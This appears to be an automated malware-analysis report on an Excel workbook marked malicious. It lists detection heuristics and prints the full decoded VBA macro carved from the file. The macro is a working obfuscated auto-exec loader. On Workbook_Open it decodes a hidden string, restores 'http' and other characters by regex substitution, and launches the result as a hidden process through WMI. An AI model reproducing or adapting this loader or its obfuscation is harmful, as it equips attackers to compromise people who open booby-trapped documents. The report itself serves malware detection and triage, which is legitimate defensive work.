MALICIOUS
210
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set RegX = CreateObject("VBScript.RegExp") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set RegX = CreateObject("VBScript.RegExp") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
NOP sled detected high SC_NOP_SLEDFound 20+ consecutive 0x90 bytesDisassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'nop' is 78% of instructions — a sled or padding/filler run, not program logic).
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5271 bytes |
SHA-256: a19fc06f444aca082d409cbfeeb97fa63b2ec0a9092456e73a4cb1402f93265d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim iwONQWhpN As String
iwONQWhpN = FfCijxROM(zpVCpUxtC(FfCijxROM("B4E2D605F67734E234B627378634E234B6C6C60242A7469476F61434E234B675D6D372A2E2A2D2548572E22734E234B607C6163634E234B68272A2E2A2D272C272947292B3023716C602A426D63597E646A434E234B60242A7469476F61434E234B675D6B3728262827434D472B27202A275D2F4A29272B20272E434E234B647E272B2727534E234B62672B27234C69672B27234E234B6E6479272B272E244F67772B272E6C672B272F6164672B2726496C672B27234E234B682727285E28565A3F2F2138383E2132373E2235343E26313F273632333435383733343839373635333E234E234B68734E234B67272C24234E234B6E667A34734E234B6D607B27272C57272B272729414D4A6A7A7C42677E234E234B68734E234B672729272C7A426D63597E646A434E234B6B3023747162747D20727F63634E234B63737824234E234B6E667A34734E234B6D607B272C572B2729414D4A6A7A7C42677E234E234B68734E234B67292")))
iwONQWhpN = GHKpEdxdz(iwONQWhpN, "X.XV", "http")
iwONQWhpN = GHKpEdxdz(iwONQWhpN, "C.Ck", "e")
iwONQWhpN = GHKpEdxdz(iwONQWhpN, "K.mP", "P")
qaGokeskk (iwONQWhpN)
End Sub
Function GHKpEdxdz(Str As String, tr As String, rep1 As String) As String
Dim RegX
Do Until "fuFqdgHhQbjTuqDCfNQJ" <> "VoAHbhbxOxUtfqhCvYFkTypcyRasjfBpM"
KGEiBzgjBdPaOzWAjoKYUXyYJKGiNj = 576583763122#
fgvgbxMWGEjwMMYDaWjvMeoQmHgZrsxWRhktSSuD = "SETkamMkHgMdnkArfuTR"
eNGMeecekHbgYtZUfLVUokMlsewjBnYa = 2.91907452798516E+26
fuFqdgHhQbjTuqDCfNQJ = VoAHbhbxOxUtfqhCvYFkTypcyRasjfBpM
Loop
Set RegX = CreateObject("VBScript.RegExp")
Dim MyString, SearchPattern, ReplacedText
MyString = Str
SearchPattern = tr
ReplaceString = rep1
RegX.Pattern = SearchPattern
RegX.Global = True
ReplacedText = RegX.Replace(MyString, ReplaceString)
GHKpEdxdz = ReplacedText
End Function
Public Function zpVCpUxtC(sData As String) As String
Dim iChar As Integer
Dim sOutString As String
Dim sTmpChar As String
Const Gravity As Double = 2.3
If Sin(0) = 7654 * 0 Then
For iChar = 1 To Len(sData) Step 2
sTmpChar = Chr("&H" & Mid(sData, iChar, Gravity))
sOutString = sOutString & sTmpChar
Next iChar
zpVCpUxtC = sOutString
Else
End If
End Function
Function qaGokeskk(Str As String)
If "YRAODtpFthcxuM" = "KeJrMVknmKknMsLvFigsRqASaLxYifIOutvDeEEu" Then
dNESGdNhmWPOTfTdrRBYLFHBWsTwIRBdl = "ocwzT"
jqvItAaNcZmnDWcXGCvNJQYVVlcO = "qhrxToUJyIWRFUjeOaOcQWtEGYTRanHXLWm"
vpjiHOIuZvDwpqHKNmaUnnruUCjLAyGiiqjY = 305809
gUCOyeKVXcjfxKZwSEHypNEewubpUNyHjTh = 6.04340555651156E+22
YFoIgZxazfDogmQm = 2.71427743230171E+34
ZBSPXREDUAJdcwdcHXMPzRP = 9.14801803565568E+32
eeQqmJixMfJROCB = 229573105599#
kFMZnxXjaLZPDWcHmBlsAOQLRLQwmLOFV = 8.27061805664616E+34
End If
Set oProcess = CreateObject("winmgmts:Win32_Process")
Set objStartup = CreateObject("winmgmts:Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = 0
Set oInParams = oProcess.Methods_(zpVCpUxtC("437265617465")). _
InParameters.SpawnInstance_
oInParams.CommandLine = Str
oInParams.ProcessStartupInformation = objConfig
For RRMNRVNDQUiUpcixOOcsumNWyWCfwTCAtrtSPz = 401968163 To 759728
CliuHyqHqhW = "cvpyfDpOuThHwSibxiQiOCaHMrGXIPMxadZ"
DsOPZ = "SiEbxpQPJHRnaaVimnwSGeHjgTsdXFU"
Jej = "DltRGsGFgmCzjVGbSHenaUuewnsEmQewqdfA"
eLNXCDuQttCytiBzwRiqPVTACSPHGIGpFhnwR = 6.27214327804951E+21
Next RRMNRVNDQUiUpcixOOcsumNWyWCfwTCAtrtSPz
Set oOutParams = oProcess.ExecMethod_(zpVCpUxtC("437265617465"), oInParams)
End Function
Function FfCijxROM(Str As String) As String
Set RegX = CreateObject("VBScript.RegExp")
RegX.Global = True
RegX.IgnoreCase = True
RegX.Pattern = ".{1}"
Set G = RegX.Execute(Str)
For c = 0 To G.Count - 1
While "YQrtbBPA" = "qRjqPvFojmWiYUWYfk"
XsEsmPaOIBpHibOAhOnuvxcrIfZAw = "VwRhccmZxaohxnteoG"
UpKspmaPM = 8.7733358229768E+36
GqaSogtpBymNHQMGOAoxdqSqbeLEcv = 4.26087382314193E+19
MZp = "kNOIHAonIXGitfjXabOGPXkqJVpNFwanRZb"
ArhxpDKTVwRYtXclLjbNdXymLbhLwSQUErXi = 7056667139291#
Wend
If Sin(23.52) + Cos(127.124) = Log(1097.02) Then
Else
xY5GK14XxWuMFZpD = G.Item(c) & xY5GK14XxWuMFZpD
End If
Next
FfCijxROM = xY5GK14XxWuMFZpD
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 24576 bytes |
SHA-256: aa703fa788dac114da560f96abc6f19661e653d43320ed2cd53b0d71eca26120 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.